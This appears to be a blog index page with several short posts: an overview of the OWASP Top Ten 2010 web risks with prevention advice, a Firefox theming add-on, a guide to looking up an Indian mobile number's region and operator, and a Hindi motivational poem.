I Hope You Like This Aritcle

Read More

OWASP Top Ten 2010 Web App Risks

"OWASP was started in September 2000 with its mission to create an open source community where people could advance their knowledge about web application and web services security issues by either contributing their knowledge to the education of others or by learning about the topic from documentation and software produced by the project. At the time the web application security market was just emerging and certain vendors were pedaling some significant marketing claims around products that really only tested a small portion of the problems web applications were facing and service companies were marketing application security testing that was really left companies with a false sense of security."

The OWASP Top Ten List represents a broad consensus about what the most critical web application security flaws are, as determined by a variety of security experts from around the world. This information is very useful for determining if a web application being secure code. The OWASP survey has added extra weight as it has become a recommendation or required best practice from a number of highly regarded sources.The major companies all using the OWASP top 10 as a guide in their web application development.

The OWASP Top 10 web Application Risks as of 2010 list, are

1. Injection

Using almost any source of data, an attacker can send a simple piece of code that exploits the syntax of a targeted interpreter. Injection can lead to data loss, corruption, or complete host takeover. To prevent injection, the use of interpreters must separate untrusted data from commands and queries. An SQL call, for example, should use bind variables and avoid dynamic queries.

2. Cross Site Scripting

This has been one of the biggest security vulnerabilities on the web for some time now.It allows attackers to hijack a user's current session and either steal information or insert hostile content. Static and dynamic tools can find some XSS problems automatically, but because each application builds output pages as JavaScript, ActiveX, Flash, Silverlight, etc., automated detection is insufficient. Manual code review and penetration testing is needed. To prevent XSS, your application must keep untrusted data separate from active browser content.

3. Broken Authentication and Session Management

Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities.

4. Insecure Direct Object References

This technique is used by an attacker who is already an authorized user. They simply change a parameter value to refer a system object to another object to gain access to other data and compromise it. All object references must have proper defenses by asking for authorization to specific resources and limiting indirect references to values authorized for the current user.

5. Cross-Site Request Forgery (CSRF)

In this attack, a forged HTTP request is used to trick victims into submitting them. Image tags, XSS, and many other techniques are used to trick users. Attackers use this to have hostile data manipulation performed on the victim's account. The simplest test for this vulnerability is to check each link and form to see if they contain an unpredictable token for each user so that attackers can't forge malicious requests. Unpredictable tokens should be included in the body or URL of each HTTP request and be unique for every user session and request.

6 Security Misconfiguration

Default accounts, unused pages, unpatched flaws, and directories can all be accessed by attackers to gain unauthorized access. Appropriate security hardening should be performed across the entire application stack to prevent this attack. Software (including ALL code libraries) should be kept up-to-date and unnecessary ports, services, pages, accounts, etc. should be removed.

7 Insecure Cryptographic Storage

Typically, hackers won't break through the cryptography directly. Instead they'll find keys, get cleartext copies of data, or find channels that automatically decrypt. To protect encrypted data, you must encrypt it in every area where it is stored long-term. Decrypted copies of the data and keys must be protected by requiring authorization

8 Failure to Restrict URL Access

This vulnerability is so easy to exploit that it must not be ignored. If the security hole exists, an attacker could simply modify a URL to access a privileged page and possibly escalate their privileges further. Developers must verify every single page and make sure external security mechanisms or code level protections are configured properly for each page. Policies should be highly configurable to minimize hard coded issues, and enforcement mechanisms should deny access by default by requiring specific grants for users.

9. Insufficient Transport Layer Protection

If user network traffic is not monitored properly, an attacker can expose data and steal accounts. A bad SSL setup can even facilitate MITM or phishing attacks. The easiest solution is to require SSL for the entire site or at least on private pages. The SSL provider should support only strong algorithms and the secure flag should be on all cookies.

10. Unvalidated Redirects and Forwards

Web apps that redirect or forward users to other URLs without proper validation of input data used to make such decisions may be vulnerable to attacks that redirect users to phishing or malware sites.

Read More

Stratiform Makes Tweaking Firefox’s Looks Simple

Usually, changing your Firefox browser's looks requires a CSS tweak, an about:config switch, or specialized downloads.

Stratiform is an all-in-one add-on that offers a variety of button, toolbar, and other visual element switches. Try out new themes and switch back without any hassle.

As Stratiform's developer notes, these kind of tweaks required developer-level or deep-down changes before Firefox 4. With the latest release, add-ons like Stratiform make tweaking colors, dimensions, fonts, and other elements is pretty simple. Click what you like, and the changes take effect instantly, with no harm to anything.

Stratiform is a free download for Firefox on Windows only, and requires Firefox 4 or later.

Download Stratiform extension here

Read More

How to Trace Mobile Phone Numbers

Today in India (Not only in india ) everyone from child to older man is having mobile phones. with the rapid growth if mobile phone usage in recent years, we have often observed that the mobile has become a part of many illegal and criminal activities. So in most cases tracing a mobile number is became a vital part in the investigating process. Also sometimes we just want to trace a mobile number for reasons like prank calls and blackmails and missed calls.

Even though it is not possible to trace the caller, it is possible to trace location of the caller and can find the phone network which is using. Just have a look at the page on Tracing Indian Mobile Numbers from Wikipedia. It is sure that we can trace any number, Location(state) and Network of mobile phone of the caller. The wiki is updated regularly so as to provide up-to-date information on newly added mobile numbers.

If you would like much simper interface where you can enter just mobile phone number and you will get country,state,city and network operator information.

Then you can try this links :

Traceindia

Indiatrace

By using this information you can trace where the caller is but not who the caller is and his name and information about him. So if you are in emergency and need to find actual person behind the call, i recommend that you file a complaint and take help of police.

Read More

Motivational Lines

Koshish Karne Walon Ki Har Nahin Hoti

Lahron Se Dar Kar Nauka Par Nahin Hoti

Koshish Karne Walon Ki Har Nahin Hoti

Nanhi Chiti Jab Dana Lekar Chalti Hai

Chadhti Deewaron Par Sau Bar Phislati Hain

Man Ka Viswas Ragon Mein Sahas Bharta Hain

Chadhkar Girna Girkar Chadhna Na Akharta Hain

Akhir Uski Mehnat Bekar Nahin Hoti

Koshis Karne Walon Ki Har Nahin Hoti

Dubkiyan Sindhu Mein Gotakhor Lagata Hain

Ja Jakar Khali Haath Laut Aata Hain

Milte Nahin Sahaj Hi Moti Gahre Pani Mein

Badhta Dugna Utsah Isi Hairani Mein

Muthi Uski Khali Har Bar Nahi Hoti

Koshis Karne Walon Ki Har Nahin Hoti

Asaflta Ek Chunauti Hain Swavikar Karo

Kya Kami Rah Gayi Dekho Aur Sudhar Karo

Jab Tak Na Safal Ho Nind Chain Ko Tyago Tum

Sangharshon Ka Maidan Chod Mat Bhago Tum

Kuch Kiye Bina Hi Jayjaykar Nahin Hoti

Koshis Karne Walon Ki Har Nahin Hoti

–Harivansh Rai Bachchan

Read More